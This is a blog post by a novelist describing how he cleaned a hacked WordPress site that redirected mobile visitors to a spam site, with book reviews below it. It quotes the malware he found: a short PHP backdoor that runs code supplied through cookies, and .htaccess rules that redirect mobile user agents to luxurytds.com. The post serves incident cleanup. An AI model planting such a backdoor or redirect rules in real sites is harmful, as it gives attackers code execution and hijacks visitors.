Skip to content

Category: Software

Fixing a WordPress Redirect Hack

So I got a frantic call from my BFF who said, Daniel, your Science Fiction novels are so good. Can you help me fix my website? This BFF obviously knows how to preface a question, so I agreed to take a look. What I found was both confusing and arousing, and after fixing it, I said to myself, Daniel, your Science Fiction novels are so good, but you’re never going to remember how to fix this. That brings us to this blog post, wherein I tell you how to stop your WordPress website from redirecting to a shitty spam site, specifically when accessed via a mobile device. The fact that the redirect only happens on mobile devices was quite interesting, but trying to investigate on an iPhone is pretty much impossible. Luckily, Chrome has you covered. Just hit F12 to open Developer Tools, and toggle the device toolbar (CTRL-SHIFT-M). Then you can trick the website into think you’re an iPhone and trigger the redirect. I did just that, tried to look at the network events, javascript debugger, etc., but found nothing! The redirect was taking me to a .bid site, so I grepped for that word in the WordPress install but didn’t find it there either. A quick Google search turned up a lot of advice about looking for encoded PHP in the theme files, but they were all clean. Then I turned my attention to the uploads folder. I found this file and couldn’t figure out what it did. daniel@bffserver [~]# cat psvkwrmv.php.fart –?php $oewzo=$_COOKIE; $ycke=$oewzo[zutc]; if($ycke){ $ojaf=$ycke($oewzo[yzda]);$gpjc=$ycke($oewzo[kvyi]);$fyup=$ojaf(“”,$gpjc);$fyup(); I ran it through the hex, base64, and php decoders but nothing came up, so I renamed it to a harmless .fart file and moved it out of the uploads directory. Then I found the culprit! Here are the contents of the .htaccess file in the uploads directory: RewriteEngine On RewriteBase / RewriteCond %{HTTP_USER_AGENT} android|bb\d+|meego|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge\ |maemo|midp|mmp|mobile.+firefox|netfront|opera\ m(ob|in)i|palm(\ os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows\ ce|xda|xiino [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^(1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a\ wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r\ |s\ )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1\ u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp(\ i|ip)|hs\-c|ht(c(\-|\ |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac(\ |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt(\ |\/)|klon|kpt\ |kwc\-|kyo(c|k)|le(no|xi)|lg(\ g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-|\ |o|v)|zz)|mt(50|p1|v\ )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v\ )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-|\ )|webc|whit|wi(g\ |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-) [NC] RewriteRule ^$ http://luxurytds.com/go.php?sid=1 [R,L] You son of a bitch .htaccess file! Sadly, whatever made those edits also touched the .htaccess files in a bunch of other directories, including the root .htaccess file that should look like this: dverast@dougherty:~/danielverastiqui.com$ cat .htaccess # BEGIN WordPress RewriteEngine On RewriteBase / RewriteRule ^index\.php$ – [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] If you need to find all the affected .htaccess files quickly, you can use grep: daniel@bffserver [~]# grep -lR “luxurytds.com” . grep: ./access-logs: No such file or directory ./www/blog/backup-1408304576-wp-admin/.htaccess ./www/blog/backup-1408304576-wp-includes/.htaccess ./www/blog/backup-1500088171-wp-admin/.htaccess ./www/blog/backup-1500088171-wp-includes/.htaccess ./www/blog/wp-content/backup-1500088171-themes/.htaccess ./www/blog/wp-content/backup-1408304576-themes/.htaccess ./www/blog/wp-content/backup-1500088171-plugins/cherry-lazy-load/.htaccess ./www/blog/wp-content/backup-1500088171-plugins/motopress-content-editor/.htaccess ./www/blog/wp-content/backup-1500088171-plugins/cherry-bgslider-plugin/.htaccess ./www/blog/wp-content/backup-1500088171-plugins/.htaccess ./www/blog/wp-content/backup-1408304576-plugins/.htaccess ./www/cgi-bin/.htaccess ./public_html/blog/backup-1408304576-wp-admin/.htaccess ./public_html/blog/backup-1408304576-wp-includes/.htaccess ./public_html/blog/backup-1500088171-wp-admin/.htaccess ./public_html/blog/backup-1500088171-wp-includes/.htaccess ./public_html/blog/wp-content/backup-1500088171-themes/.htaccess ./public_html/blog/wp-content/backup-1408304576-themes/.htaccess ./public_html/blog/wp-content/backup-1500088171-plugins/cherry-lazy-load/.htaccess ./public_html/blog/wp-content/backup-1500088171-plugins/motopress-content-editor/.htaccess ./public_html/blog/wp-content/backup-1500088171-plugins/cherry-bgslider-plugin/.htaccess ./public_html/blog/wp-content/backup-1500088171-plugins/.htaccess ./public_html/blog/wp-content/backup-1408304576-plugins/.htaccess ./public_html/cgi-bin/.htaccess After I deleted every .htaccess file and replaced them with defaults or recommended, the site stopped redirecting. Success! However: I still don’t know exactly how the .htaccess files were being invoked. I mean, I kinda do, but in a much more real way, I have no idea. Would be interested to know for sure.…

Recent Reviews

Things not as they appear… Veneer depicts a future where kids learn at a young age to manipulate their surroundings. Nothing is quite as it seems. If someone doesn’t like the way their face looks, they veneer it. Old buildings are veneered to look new again. And on and on. Everything looks great, but obviously there are cracks beneath the surface. What happens when someone loses their ability to see the veneer at at all? I’m not even that big on sci-fi normally, but I really enjoyed this book. Veneer has a very creative concept that is a reflection of our society today. With the constant Photoshopping of everything these days, this setting hits uncomfortably close to home, in a good way. The characters, several groups of high school students, gradually put together the pieces of what’s going on, and I was right there with them wanting to know what happened next. The kids have typical problems of students: long-standing rivalry with a violent bully, whether to manipulate an unrequited love into being with you, how to free yourself from just being someone’s sidekick. The author provides the story from different perspectives so no character is just a cipher or cliche. Their individual struggles fit in well with the larger plot of figuring out the things that are amiss with the veneer and in life as they know it. Veneer is futuristic fun with a good amount of sex and action, but it’s also got deeper messages about society which in my opinion is good sci-fi. I recommend it!

Lee Moody – Veneer

What just happened?!? I kept thinking that. This book will definitely keep you on the edge. You think you know…. and then you don’t. Great read!

Amazon Customer 1 – Por Vida
© 2018 Daniel Verastiqui